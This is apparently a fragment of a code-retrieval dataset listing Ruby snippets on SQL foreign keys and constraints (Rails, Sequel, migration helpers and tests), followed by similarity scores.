"def check_add_foreign_key(*args)\n options = args.extract_options!\n from_table, to_table = args\n\n validate = options.fetch(:validate, true)\n if postgresql? && validate\n if StrongMigrations.safe_by_default\n safe_add_foreign_key(*args, **options)\n throw :safe\n end\n\n raise_error :add_foreign_key,\n add_foreign_key_code: command_str(\"add_foreign_key\", [from_table, to_table, options.merge(validate: false)]),\n validate_foreign_key_code: command_str(\"validate_foreign_key\", [from_table, to_table])\n end\n end",
"def test_add_invalid_foreign_key\n @connection.add_foreign_key :astronauts, :rockets, column: \"rocket_id\", validate: false\n\n foreign_keys = @connection.foreign_keys(\"astronauts\")\n assert_equal 1, foreign_keys.size\n\n fk = foreign_keys.first\n assert_predicate fk, :validated?\n end",
"def supports_named_column_constraints?\n true\n end",
"def stores_foreign_key?; true; end",
"def check_add_foreign_key(*args); end",
"def create_constraints(drop = nil)\n contraints = {\n \"Page\" => [:page_id],\n \"Term\" => [:uri]\n }\n contraints.each do |label, fields|\n fields.each do |field|\n begin\n name = 'o'\n name = label.downcase if drop && drop == :drop\n query(\n \"#{drop && drop == :drop ? 'DROP' : 'CREATE'} CONSTRAINT ON (#{name}:#{label}) ASSERT #{name}.#{field} IS UNIQUE;\"\n )\n rescue Neography::NeographyError => e\n raise e unless e.message =~ /already exists/ || e.message =~ /No such constraint/\n end\n end\n end\n end",
"def foreign_key_constraint(from_table, from_column, options = {})\n to_table = options[:to_table] || from_column.to_s[/^(.+)_id$/, 1].tableize\n on_delete = case options[:on_delete]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n end\n on_update = case options[:on_update]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n when :restrict; 'restrict'\n end\n cmd = [ \"constraint #{constraint_name from_table, from_column}\",\n \"foreign key (#{from_column})\",\n \"references #{ActiveRecord::Base.connection.quote_table_name to_table}(id)\",\n ]\n cmd << \"on delete #{on_delete}\" if on_delete\n cmd << \"on update #{on_update}\" if on_update\n cmd.join(' ')\n end",
"def preconditions\n !column.null && column.default.nil? && !primary_field? && !timestamp_field? && !column.default_function\n end",
"def remove_foreign_key(from_table, from_column, to_table)\n constraint_name = \"fk_#{from_table}_#{from_column}\"\n # check if constraint already exist\n count = ActiveRecord::Base.connection.select_value(\"select count(1) from pg_constraint where conname='#{constraint_name}'\")\n\n unless count.to_i == 0\n execute %{ALTER TABLE #{from_table} DROP CONSTRAINT #{constraint_name}}\n end\n end",
"def dump_add_fk_constraints(table, fks)\n sfks = String.new\n sfks << \"alter_table(#{table.inspect}) do\\n\"\n sfks << create_table_generator do\n fks.sort_by{|fk| fk[:columns]}.each do |fk|\n foreign_key fk[:columns], fk\n end\n end.dump_constraints.gsub(/^foreign_key /, ' add_foreign_key ')\n sfks << \"\\nend\"\n end",
"def test_adding_bears_to_the_farm_with_t_dot_foreign_key_farm_dependent_nullify\n premigrate\n table = \"bears\"\n migrate table\n assert_match(/FOREIGN KEY \\(\\\"farm_id\\\"\\) REFERENCES \\\"farms\\\"\\(id\\) ON DELETE SET NULL/, schema(table))\n end",
"def foreign_key?\n @ref_table ? true : false\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def constraint_name(table_name, relationship_name)\n \"#{table_name}_#{relationship_name}_fk\"\n end",
"def create_constraints_statement(table_name, constraint_name, keys, foreign_table, foreign_keys, delete_constraint_type)\n <<-EOS.compress_lines\n ALTER TABLE #{quote_table_name(table_name)}\n ADD CONSTRAINT #{quote_constraint_name(constraint_name)}\n FOREIGN KEY (#{keys * ', '})\n REFERENCES #{quote_table_name(foreign_table)} (#{foreign_keys * ', '})\n ON DELETE #{delete_constraint_type}\n ON UPDATE #{delete_constraint_type}\n EOS\n end",
"def build_constraints\n Schema::Logical::Constraint.new\n end",
"def quote_constraint_name(foreign_key)\n quote_table_name(foreign_key)\n end",
"def setup_auto_validations\n not_null_cols, explicit_not_null_cols = db_schema.select{|col, sch| sch[:allow_null] == false}.partition{|col, sch| sch[:default].nil?}.map{|cs| cs.map{|col, sch| col}}\n @auto_validate_not_null_columns = not_null_cols - Array(primary_key)\n explicit_not_null_cols += Array(primary_key)\n @auto_validate_explicit_not_null_columns = explicit_not_null_cols.uniq\n @auto_validate_max_length_columns = db_schema.select{|col, sch| sch[:type] == :string && sch[:max_length].is_a?(Integer)}.map{|col, sch| [col, sch[:max_length]]}\n table = dataset.first_source_table\n @auto_validate_unique_columns = if db.supports_index_parsing? && [Symbol, SQL::QualifiedIdentifier, SQL::Identifier, String].any?{|c| table.is_a?(c)}\n db.indexes(table).select{|name, idx| idx[:unique] == true}.map{|name, idx| idx[:columns].length == 1 ? idx[:columns].first : idx[:columns]}\n else\n []\n end\n end",
"def constraint_definition_sql(constraint)\n sql = String.new\n sql << \"CONSTRAINT #{quote_identifier(constraint[:name])} \" if constraint[:name] \n case constraint[:type]\n when :check\n check = constraint[:check]\n check = check.first if check.is_a?(Array) && check.length == 1\n check = filter_expr(check)\n check = \"(#{check})\" unless check[0..0] == '(' && check[-1..-1] == ')'\n sql << \"CHECK #{check}\"\n when :primary_key\n sql << \"#{primary_key_constraint_sql_fragment(constraint)} #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << column_references_table_constraint_sql(constraint.merge(:deferrable=>nil))\n when :unique\n sql << \"#{unique_constraint_sql_fragment(constraint)} #{literal(constraint[:columns])}\"\n else\n raise Error, \"Invalid constraint type #{constraint[:type]}, should be :check, :primary_key, :foreign_key, or :unique\"\n end\n constraint_deferrable_sql_append(sql, constraint[:deferrable])\n sql\n end",
"def test_keeping_default_and_notnull_constraints_on_change\n connection.create_table :testings do |t|\n t.column :title, :string\n end\n person_klass = Class.new(ActiveRecord::Base)\n person_klass.table_name = \"testings\"\n\n person_klass.connection.add_column \"testings\", \"wealth\", :integer, null: false, default: 99\n person_klass.reset_column_information\n assert_equal 99, person_klass.column_defaults[\"wealth\"]\n assert_equal false, person_klass.columns_hash[\"wealth\"].null\n assert_nothing_raised { person_klass.connection.execute(\"insert into testings (title) values ('tester')\") }\n\n # change column default to see that column doesn't lose its not null definition\n person_klass.connection.change_column_default \"testings\", \"wealth\", 100\n person_klass.reset_column_information\n assert_equal 100, person_klass.column_defaults[\"wealth\"]\n assert_equal false, person_klass.columns_hash[\"wealth\"].null\n\n # rename column to see that column doesn't lose its not null and/or default definition\n person_klass.connection.rename_column \"testings\", \"wealth\", \"money\"\n person_klass.reset_column_information\n assert_nil person_klass.columns_hash[\"wealth\"]\n assert_equal 100, person_klass.column_defaults[\"money\"]\n assert_equal false, person_klass.columns_hash[\"money\"].null\n\n # change column\n person_klass.connection.change_column \"testings\", \"money\", :integer, null: false, default: 1000\n person_klass.reset_column_information\n assert_equal 1000, person_klass.column_defaults[\"money\"]\n assert_equal false, person_klass.columns_hash[\"money\"].null\n\n # change column, make it nullable and clear default\n person_klass.connection.change_column \"testings\", \"money\", :integer, null: true, default: nil\n person_klass.reset_column_information\n assert_nil person_klass.columns_hash[\"money\"].default\n assert_equal true, person_klass.columns_hash[\"money\"].null\n\n # change_column_null, make it not nullable and set null values to a default value\n person_klass.connection.execute(\"UPDATE testings SET money = NULL\")\n person_klass.connection.change_column_null \"testings\", \"money\", false, 2000\n person_klass.reset_column_information\n assert_nil person_klass.columns_hash[\"money\"].default\n assert_equal false, person_klass.columns_hash[\"money\"].null\n assert_equal 2000, connection.select_values(\"SELECT money FROM testings\").first.to_i\n end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n case constraint[:constraint_type]\n when :primary_key\n sql << \"PRIMARY KEY #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << \"FOREIGN KEY #{literal(constraint[:columns])}\"\n sql << column_references_sql(constraint)\n when :unique\n sql << \"UNIQUE #{literal(constraint[:columns])}\"\n else\n check = constraint[:check]\n sql << \"CHECK #{filter_expr((check.is_a?(Array) && check.length == 1) ? check.first : check)}\"\n end\n sql\n end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n case constraint[:constraint_type]\n when :primary_key\n sql << \"PRIMARY KEY #{literal(constraint[:columns])}\"\n when :foreign_key\n sql << \"FOREIGN KEY #{literal(constraint[:columns])}\"\n sql << column_references_sql(constraint)\n when :unique\n sql << \"UNIQUE #{literal(constraint[:columns])}\"\n else\n check = constraint[:check]\n sql << \"CHECK #{filter_expr((check.is_a?(Array) && check.length == 1) ? check.first : check)}\"\n end\n sql\n end",
"def _constrainable\n @constrainable ||= {}\n end",
"def foreign_keys\n @foreign_keys ||= connection.foreign_keys(table_name, \"#{name} Foreign Keys\")\n end",
"def saint_saens; end",
"def column_references_table_constraint_sql(constraint)\n \"FOREIGN KEY #{literal(constraint[:columns])}#{column_references_sql(constraint)}\"\n end",
"def test_emailers_restrict_delete\n\t\terr = assert_raises PG::ForeignKeyViolation do\n\t\t\tDB.exec(\"DELETE FROM people WHERE id=7\")\n\t\tend\n\t\tassert err.message.include? 'emailers_person_id_fkey'\n\tend",
"def constraint_name(table, field)\n \"fk_#{table}_#{field_list_name(field)}\"\n end",
"def primary_key_constraint_sql_fragment(_)\n 'PRIMARY KEY'\n end",
"def foreign_key_params\n params.require(:foreign_key).permit(:source_column, :source_table, :target_column, :target_table)\n end",
"def supports_exclusion_constraints?\n false\n end",
"def test_foreign_key_violations_on_delete_are_translated_to_specific_exception\n insert_into_fk_test_has_fk fk_id: 1\n\n error = assert_raises(ActiveRecord::InvalidForeignKey) do\n @connection.execute \"DELETE FROM fk_test_has_pk WHERE pk_id = 1\"\n end\n\n assert_not_nil error.cause\n end",
"def is_userconstraint?(); @type == GRT_USERCONSTRAINT; end",
"def supports_foreign_key_parsing?\n respond_to?(:foreign_key_list)\n end",
"def stores_foreign_key?\n false\n end",
"def foreign_key(relation)\n detect { |attr| attr.foreign_key? && attr.target == relation }\n end",
"def compound_key_constraints\n @compound_key_constraints ||= {}\n end",
"def column_definition_primary_key_sql(sql, column)\n if column[:primary_key]\n if name = column[:primary_key_constraint_name]\n sql << \" CONSTRAINT #{quote_identifier(name)}\"\n end\n sql << \" \" << primary_key_constraint_sql_fragment(column)\n constraint_deferrable_sql_append(sql, column[:primary_key_deferrable])\n end\n end",
"def foreign_key?\n index == entity.key_column && !entity.is_core\n end",
"def foreign_key?\n options.fetch(:foreign_key, false)\n end",
"def column_definition_references_sql(sql, column)\n if column[:table]\n if name = column[:foreign_key_constraint_name]\n sql << \" CONSTRAINT #{quote_identifier(name)}\"\n end\n sql << column_references_column_constraint_sql(column)\n end\n end",
"def unique_constraint_sql_fragment(_)\n 'UNIQUE'\n end",
"def database_specific_error_class(exception, opts)\n case exception.errno\n when 1048\n NotNullConstraintViolation\n when 1062\n UniqueConstraintViolation\n when 1451, 1452\n ForeignKeyConstraintViolation\n else\n super\n end\n end",
"def validate(record)\n if record._database_validations_fallback\n super\n else\n return unless record.public_send(foreign_key).blank? && record.public_send(association).blank?\n\n record.errors.add(association, :blank, message: :required)\n end\n end",
"def add_constraints(scope)\n tables = construct_tables\n \n chain.each_with_index do |reflection, i|\n table, foreign_table = tables.shift, tables.first\n \n if reflection.source_macro == :has_and_belongs_to_many\n join_table = tables.shift\n \n scope = scope.joins(join(\n join_table,\n table[association_primary_key].\n eq(join_table[association_foreign_key])\n ))\n \n table, foreign_table = join_table, tables.first\n end\n \n if reflection.source_macro == :belongs_to\n if reflection.options[:polymorphic]\n key = reflection.association_primary_key(self.klass)\n else\n key = reflection.association_primary_key\n end\n \n foreign_key = reflection.foreign_key\n else\n key = reflection.foreign_key\n foreign_key = reflection.active_record_primary_key\n end\n \n # this is our addition\n table, key = maybe_split(table, key, reflection)\n foreign_table, foreign_key = maybe_split(foreign_table, foreign_key, reflection)\n # end\n \n if reflection == chain.last \n bind_val = bind scope, table.table_name, key.to_s, owner[foreign_key]\n scope = scope.where(table[key].eq(bind_val))\n \n if reflection.type\n value = owner.class.base_class.name\n bind_val = bind scope, table.table_name, reflection.type.to_s, value\n scope = scope.where(table[reflection.type].eq(bind_val))\n end\n else\n constraint = table[key].eq(foreign_table[foreign_key])\n \n if reflection.type\n type = chain[i + 1].klass.base_class.name\n constraint = constraint.and(table[reflection.type].eq(type))\n end\n \n scope = scope.joins(join(foreign_table, constraint))\n end\n \n # Exclude the scope of the association itself, because that\n # was already merged in the #scope method.\n scope_chain[i].each do |scope_chain_item|\n klass = i == 0 ? self.klass : reflection.klass\n item = eval_scope(klass, scope_chain_item)\n \n if scope_chain_item == self.reflection.scope\n scope.merge! item.except(:where, :includes)\n end\n \n scope.includes! item.includes_values\n scope.where_values += item.where_values\n scope.order_values |= item.order_values\n end\n end\n \n scope\n end",
"def apply_alter_table_generator(name, generator)\n ops = generator.operations\n\n unless can_add_primary_key_constraint_on_nullable_columns?\n if add_pk = ops.find{|op| op[:op] == :add_constraint && op[:type] == :primary_key}\n ops = add_pk[:columns].map{|column| {:op => :set_column_null, :name => column, :null => false}} + ops\n end\n end\n\n apply_alter_table(name, ops)\n end",
"def foreign_keys(table_name)\n stmt = @connection.foreign_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n result.map do |key|\n fk_from_table = key[2] # PKTABLE_NAME\n fk_to_table = key[6] # FKTABLE_NAME\n\n ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new(\n fk_from_table,\n fk_to_table,\n name: key[11], # FK_NAME\n column: key[3], # PKCOLUMN_NAME\n primary_key: key[7], # FKCOLUMN_NAME\n on_delete: key[10], # DELETE_RULE\n on_update: key[9] # UPDATE_RULE\n )\n end\n end",
"def apply_constraints_to_record(record, options = {})\n options[:allow_autosave] = false if options[:allow_autosave].nil?\n constraints = options[:constraints] || active_scaffold_constraints\n\n config = record.is_a?(active_scaffold_config.model) ? active_scaffold_config : active_scaffold_config_for(record.class)\n constraints.each do |k, v|\n column = config.columns[k]\n if column&.association\n if column.association.collection?\n record.send(k.to_s).send(:<<, column.association.klass.find(v))\n elsif column.association.polymorphic?\n unless v.is_a?(Array) && v.size == 2\n raise ActiveScaffold::MalformedConstraint, polymorphic_constraint_error(column.association), caller\n end\n record.send(\"#{k}=\", v[0].constantize.find(v[1]))\n elsif !column.association.source_reflection&.options&.include?(:through) # regular singular association, or one-level through association\n record.send(\"#{k}=\", column.association.klass.find(v))\n\n # setting the belongs_to side of a has_one isn't safe. if the has_one was already\n # specified, rails won't automatically clear out the previous associated record.\n #\n # note that we can't take the extra step to correct this unless we're permitted to\n # run operations where activerecord auto-saves the object.\n reverse = column.association.reverse_association\n if reverse.singular? && !reverse.belongs_to? && options[:allow_autosave]\n record.send(k).send(\"#{reverse.name}=\", record)\n end\n end\n else\n record.send(\"#{k}=\", v)\n end\n end\n end",
"def constraint_definition_sql(constraint)\n sql = constraint[:name] ? \"CONSTRAINT #{quote_identifier(constraint[:name])} \" : \"\"\n sql << \"CHECK #{filter_expr(constraint[:check])}\"\n sql\n end",
"def bindable?(doc)\n forced_nil_inverse? || (!!inverse && doc.fields.keys.include?(foreign_key))\n end",
"def test_foreign_key_violations_on_insert_are_translated_to_specific_exception\n error = assert_raises(ActiveRecord::InvalidForeignKey) do\n insert_into_fk_test_has_fk\n end\n\n assert_not_nil error.cause\n end",
"def _semantics_check(clazz, buffer)\n if constraints.primary_key.nil?\n buffer.add_error(self, clazz::MissingPrimaryKey)\n end\n super(clazz, buffer)\n end",
"def need_associated_primary_key?\n false\n end",
"def foreign_key(clazz=nil)\n @foreign_key || begin\n if @type == :t_belongs_to\n belongs_to_foreign_key\n elsif @type == :t_has_one || @type == :t_has_many\n has_x_foreign_key(clazz)\n end\n end\n end",
"def foreign_key_for?(record)\n foreign_key = Array(reflection.foreign_key)\n foreign_key.all? { |key| record._has_attribute?(key) }\n end",
"def need_associated_primary_key?\n true\n end"
] |
[
"0.79280597",
"0.79274535",
"0.7805954",
"0.734535",
"0.72932184",
"0.68518835",
"0.6851376",
"0.6846686",
"0.65102047",
"0.63518226",
"0.63061714",
"0.63061714",
"0.6213247",
"0.6213247",
"0.6106287",
"0.6096646",
"0.608334",
"0.6045513",
"0.6045513",
"0.6045513",
"0.6021384",
"0.600553",
"0.600553",
"0.59802794",
"0.5962776",
"0.5953225",
"0.5950546",
"0.59376353",
"0.5930125",
"0.59262735",
"0.5911484",
"0.59014225",
"0.59014225",
"0.58497566",
"0.58497566",
"0.58409536",
"0.5813042",
"0.57669663",
"0.5731412",
"0.5728956",
"0.57251835",
"0.57120043",
"0.57038563",
"0.5689721",
"0.5684284",
"0.5670924",
"0.56476325",
"0.5634747",
"0.5620577",
"0.5609877",
"0.56077576",
"0.56035143",
"0.5584245",
"0.55492103",
"0.5542081",
"0.5535381",
"0.5535381",
"0.5523422",
"0.551439",
"0.55017275",
"0.5500663",
"0.54955256",
"0.5492991",
"0.5485903",
"0.5468469",
"0.54429615",
"0.5437908",
"0.5412928",
"0.536716",
"0.534708",
"0.5339759",
"0.5315693",
"0.5303086",
"0.5279549",
"0.526408",
"0.5258896",
"0.524789",
"0.5246512",
"0.5244143",
"0.5237569",
"0.52365625",
"0.5234686",
"0.5232824",
"0.52316725",
"0.52273303",
"0.52206355",
"0.5220494",
"0.52070624",
"0.51929504",
"0.5189598",
"0.5185038",
"0.517124",
"0.51536494",
"0.5137656",
"0.5131563",
"0.51253927",
"0.51225525",
"0.50938976",
"0.5091623",
"0.50774205"
] |
0.540124
|
68
|
PostgreSQL supports deferrable foreign key constraints.
|
def supports_deferrable_foreign_key_constraints?
true
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def supports_deferrable_foreign_key_constraints?\n supports_deferrable_constraints?\n end",
"def foreign_key_present?\n false\n end",
"def foreign_key_present?\n false\n end",
"def foreign_keys\n @foreign_keys ||= connection.foreign_keys(table_name, \"#{name} Foreign Keys\")\n end",
"def foreign_key?\n false\n end",
"def stores_foreign_key?; false; end",
"def stores_foreign_key?; false; end",
"def foreign_key_constraints_enabled?\n @disable_foreign_key_constraints != true\n end",
"def foreign_key?\n true\n end",
"def supports_foreign_keys?\n false\n end",
"def supports_foreign_keys?\n false\n end",
"def foreign_key_default\n nil\n end",
"def foreign_key_list(table, opts=OPTS)\n super\n rescue Sequel::DatabaseError => e\n raise unless foreign_key_error?(e)\n []\n end",
"def foreign_key?\n @ref_table ? true : false\n end",
"def dump_add_fk_constraints(table, fks)\n sfks = String.new\n sfks << \"alter_table(#{table.inspect}) do\\n\"\n sfks << create_table_generator do\n fks.sort_by{|fk| fk[:columns]}.each do |fk|\n foreign_key fk[:columns], fk\n end\n end.dump_constraints.gsub(/^foreign_key /, ' add_foreign_key ')\n sfks << \"\\nend\"\n end",
"def stores_foreign_key?; true; end",
"def check_add_foreign_key(*args)\n options = args.extract_options!\n from_table, to_table = args\n\n validate = options.fetch(:validate, true)\n if postgresql? && validate\n if StrongMigrations.safe_by_default\n safe_add_foreign_key(*args, **options)\n throw :safe\n end\n\n raise_error :add_foreign_key,\n add_foreign_key_code: command_str(\"add_foreign_key\", [from_table, to_table, options.merge(validate: false)]),\n validate_foreign_key_code: command_str(\"validate_foreign_key\", [from_table, to_table])\n end\n end",
"def supports_foreign_keys_in_create?\n supports_foreign_keys?\n end",
"def supports_external_drop_constraints?() true; end",
"def supports_foreign_tables?\n false\n end",
"def supports_foreign_tables?\n false\n end",
"def supports_external_drop_constraints?() false; end",
"def implementation_no_master_association\n defined?(foreign_key_name) && foreign_key_name.blank?\n end",
"def check_add_foreign_key(*args); end",
"def foreign_key?\n options.fetch(:foreign_key, false)\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def foreign_key_for assoc_name\n raise NotImplementedError\n end",
"def can_add_primary_key_constraint_on_nullable_columns?\n true\n end",
"def supports_deferrable_constraints?\n false\n end",
"def foreign_keys(table_name)\n stmt = @connection.foreign_keys(native_case(table_name.to_s))\n result = stmt.fetch_all || []\n stmt.drop unless stmt.nil?\n\n result.map do |key|\n fk_from_table = key[2] # PKTABLE_NAME\n fk_to_table = key[6] # FKTABLE_NAME\n\n ActiveRecord::ConnectionAdapters::ForeignKeyDefinition.new(\n fk_from_table,\n fk_to_table,\n name: key[11], # FK_NAME\n column: key[3], # PKCOLUMN_NAME\n primary_key: key[7], # FKCOLUMN_NAME\n on_delete: key[10], # DELETE_RULE\n on_update: key[9] # UPDATE_RULE\n )\n end\n end",
"def references_with_foreign_key(*args)\n # Don't pop, unlike extract_options!, because we need to leave *args intact.\n options = args.last.is_a?(::Hash) ? args.last : {}\n polymorphic = options.has_key? :polymorphic\n\n references_without_foreign_key *args\n\n # Now we discard any options.\n options = args.extract_options! \n\n unless polymorphic\n args.each do |column|\n @@foreign_keys << [\"#{column}_id\", options]\n end\n end\n end",
"def remove_foreign_key(from_table, from_column, to_table)\n constraint_name = \"fk_#{from_table}_#{from_column}\"\n # check if constraint already exist\n count = ActiveRecord::Base.connection.select_value(\"select count(1) from pg_constraint where conname='#{constraint_name}'\")\n\n unless count.to_i == 0\n execute %{ALTER TABLE #{from_table} DROP CONSTRAINT #{constraint_name}}\n end\n end",
"def test_add_invalid_foreign_key\n @connection.add_foreign_key :astronauts, :rockets, column: \"rocket_id\", validate: false\n\n foreign_keys = @connection.foreign_keys(\"astronauts\")\n assert_equal 1, foreign_keys.size\n\n fk = foreign_keys.first\n assert_predicate fk, :validated?\n end",
"def drop_foreign_key(table, field)\n execute \"ALTER TABLE #{table} DROP FOREIGN KEY #{constraint_name(table, field)}\"\n end",
"def test_adding_bears_to_the_farm_with_t_dot_foreign_key_farm_dependent_nullify\n premigrate\n table = \"bears\"\n migrate table\n assert_match(/FOREIGN KEY \\(\\\"farm_id\\\"\\) REFERENCES \\\"farms\\\"\\(id\\) ON DELETE SET NULL/, schema(table))\n end",
"def foreign_key_constraint(from_table, from_column, options = {})\n to_table = options[:to_table] || from_column.to_s[/^(.+)_id$/, 1].tableize\n on_delete = case options[:on_delete]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n end\n on_update = case options[:on_update]\n when :cascade; 'cascade'\n when :nullify; 'set null'\n when :restrict; 'restrict'\n end\n cmd = [ \"constraint #{constraint_name from_table, from_column}\",\n \"foreign key (#{from_column})\",\n \"references #{ActiveRecord::Base.connection.quote_table_name to_table}(id)\",\n ]\n cmd << \"on delete #{on_delete}\" if on_delete\n cmd << \"on update #{on_update}\" if on_update\n cmd.join(' ')\n end",
"def supports_deferrable_constraints?\n false\n end",
"def check_all_foreign_keys_valid!\n end",
"def foreign_key(relation)\n detect { |attr| attr.foreign_key? && attr.target == relation }\n end",
"def belongs_to_with_foreign_key_migrations(*args)\n options = args.extract_options!\n options[:references] = nil if options[:polymorphic]\n belongs_to_without_foreign_key_migrations(*args.push(options))\n end",
"def belongs_to_with_foreign_key_migrations(*args)\n options = args.extract_options!\n options[:references] = nil if options[:polymorphic]\n belongs_to_without_foreign_key_migrations(*args.push(options))\n end",
"def quote_constraint_name(foreign_key)\n quote_table_name(foreign_key)\n end",
"def foreign_keys(table_name, stream)\n if (foreign_keys = @connection.foreign_keys(table_name)).any?\n add_foreign_key_statements = foreign_keys.map do |foreign_key|\n options = foreign_key.options\n table_from_key = foreign_key.to_table\n statement_parts = [ ('add_foreign_key ' + foreign_key.from_table.inspect) ]\n statement_parts << table_from_key.inspect\n statement_parts << (':name => ' + options[:name].inspect)\n\n column_from_options = options[:column]\n primary_key_from_options = options[:primary_key]\n dependent_from_options = options[:dependent]\n\n if column_from_options != \"#{table_from_key.singularize}_id\"\n statement_parts << (\":column => #{column_from_options.inspect}\")\n end\n if primary_key_from_options != 'id'\n statement_parts << (\":primary_key => #{primary_key_from_options.inspect}\")\n end\n if dependent_from_options.present?\n statement_parts << (\":dependent => #{dependent_from_options.inspect}\")\n end\n\n # Always exclude the index\n # If an index was created in a migration, it will get dumped to the schema\n # separately from the foreign key. This will raise an exception if\n # add_foreign_key is run without :exclude_index => true.\n statement_parts << (':exclude_index => true')\n\n ' ' + statement_parts.join(', ')\n end\n\n stream.puts add_foreign_key_statements.sort.join(\"\\n\")\n stream.puts\n end\n end",
"def dump_table_foreign_keys(table, options=OPTS)\n if supports_foreign_key_parsing?\n fks = foreign_key_list(table, options).sort_by{|fk| fk[:columns]}\n end\n\n if fks.nil? || fks.empty?\n ''\n else\n dump_add_fk_constraints(table, fks)\n end\n end",
"def stores_foreign_key?\n false\n end",
"def import_foreign_keys( table )\n for opts in db.foreign_key_list( table.name )\n opts = opts.dup\n name = opts.delete( :name )\n columns = opts.delete( :columns )\n table_name = opts.delete( :table )\n opts.delete( :deferrable ) unless opts[ :deferrable ]\n table.add_foreign_key( columns, table_name, opts )\n end\n end",
"def column_references_table_constraint_sql(constraint)\n \"FOREIGN KEY #{literal(constraint[:columns])}#{column_references_sql(constraint)}\"\n end",
"def foreign_key\n meta(foreign_key: true)\n end",
"def all_foreign_keys_valid?\n check_all_foreign_keys_valid!\n true\n rescue ActiveRecord::StatementInvalid\n false\n end",
"def remove_foreign_key(table_name, *args)\n if self.adapter_name == \"PostgreSQL\" or self.adapter_name == \"MySQL\"\n options = args.extract_options!\n name = if options[:name]\n options[:name]\n else\n columns = args.first\n index_name(table_name, :column => Array(columns))\n end\n\n execute \"ALTER TABLE #{quote_table_name(table_name)} DROP FOREIGN KEY #{quote_column_name(name)}\"\n end\n end",
"def constraint_name(table_name, relationship_name)\n \"#{table_name}_#{relationship_name}_fk\"\n end",
"def foreign_key\n @foreign_key ||= @options[:foreign_key] ? @options[:foreign_key].to_s :\n default_foreign_key_field\n end",
"def foreign_key\n @foreign_key ||= (@options[:foreign_key] || \"#{@name}_id\").to_s\n end",
"def foreign_key_params\n params.require(:foreign_key).permit(:source_column, :source_table, :target_column, :target_table)\n end",
"def foreign_key(clazz=nil)\n @foreign_key || begin\n if @type == :t_belongs_to\n belongs_to_foreign_key\n elsif @type == :t_has_one || @type == :t_has_many\n has_x_foreign_key(clazz)\n end\n end\n end",
"def foreign_key?\n index == entity.key_column && !entity.is_core\n end",
"def spanner_create_table_with_foreign_key_delete_cascade project_id:, instance_id:, database_id:\n db_admin_client = Google::Cloud::Spanner::Admin::Database.database_admin\n\n database_path = db_admin_client.database_path project: project_id,\n instance: instance_id,\n database: database_id\n\n job = db_admin_client.update_database_ddl database: database_path, statements: [\n %{ CREATE TABLE Customers (\n CustomerId INT64 NOT NULL,\n CustomerName STRING(62) NOT NULL,\n ) PRIMARY KEY (CustomerId)},\n %{ CREATE TABLE ShoppingCarts (\n CartId INT64 NOT NULL,\n CustomerId INT64 NOT NULL,\n CustomerName STRING(62) NOT NULL,\n CONSTRAINT FKShoppingCartsCustomerId FOREIGN KEY (CustomerId)\n REFERENCES Customers (CustomerId) ON DELETE CASCADE\n ) PRIMARY KEY (CartId)}\n ]\n\n puts \"Waiting for operation to complete...\"\n job.wait_until_done!\n puts \"Created Customers and ShoppingCarts table with FKShoppingCartsCustomerId \\\n foreign key constraint on database #{database_id} on instance #{instance_id}\"\nend",
"def column_definition_references_sql(sql, column)\n if column[:table]\n if name = column[:foreign_key_constraint_name]\n sql << \" CONSTRAINT #{quote_identifier(name)}\"\n end\n sql << column_references_column_constraint_sql(column)\n end\n end",
"def test_foreign_key_violations_on_delete_are_translated_to_specific_exception\n insert_into_fk_test_has_fk fk_id: 1\n\n error = assert_raises(ActiveRecord::InvalidForeignKey) do\n @connection.execute \"DELETE FROM fk_test_has_pk WHERE pk_id = 1\"\n end\n\n assert_not_nil error.cause\n end",
"def foreign_key(*args)\n # get the name\n name = String===args[0] ? args.shift : \"fk_#{@relvar.name}_#{@relvar.foreign_keys.size}\"\n \n # get the attribute => key mapping\n raise \"Invalid foreign key definition #{args.inspect}\" unless \\\n args.size==1 and Hash===args[0] and \\\n args[0].size == 1\n mapping = args[0]\n \n # get the attributes now\n attributes = args[0].keys.flatten.collect{|a| @relvar.attribute(a, true)}\n \n # get the target now\n target = mapping.values[0]\n target = target.primary_key if Relvar === target\n raise \"Invalid foreign key #{name} for #{@relvar.name} (#{target.inspect})\" unless Key===target\n\n @relvar.add_foreign_key(name, attributes, target)\n end",
"def record_foreign_keys(parent_record)\n association_foreign_keys(parent_record)\n end",
"def to_sql_with_foreign_keys\n from_table = AirBlade::Migrations::SchemaStatements.table_name\n fks = @@foreign_keys.map{ |column, options| foreign_key_constraint from_table, column, options }\n [ to_sql_without_foreign_keys, fks ].reject{ |x| x.blank? }.join ', '\n end",
"def reverse_foreign_keys\n connection.reverse_foreign_keys(table_name, \"#{name} Reverse Foreign Keys\")\n end",
"def drop_foreign_key(from_table, from_column)\n execute [ \"alter table #{quote_table_name from_table}\",\n \"drop foreign key #{constraint_name from_table, from_column}\"\n ].join(' ')\n end",
"def foreign_key\n self.name + \"_id\"\n end",
"def references(*args)\n options = args.extract_options!\n polymorphic = options.delete(:polymorphic)\n\n options[:referenced_table] = options.delete(:table)\n if options[:referenced_table] && polymorphic\n raise ArgumentError, \"not possible to create a foreign key on a polymorphic association\"\n end\n\n args.each do |col|\n column(\"#{col}_id\", :integer, options)\n foreign_key(\"#{col}_id\", options[:referenced_table], 'id') if options[:referenced_table]\n column(\"#{col}_type\", :string, polymorphic.is_a?(Hash) ? polymorphic : options) unless polymorphic.nil?\n end\n end",
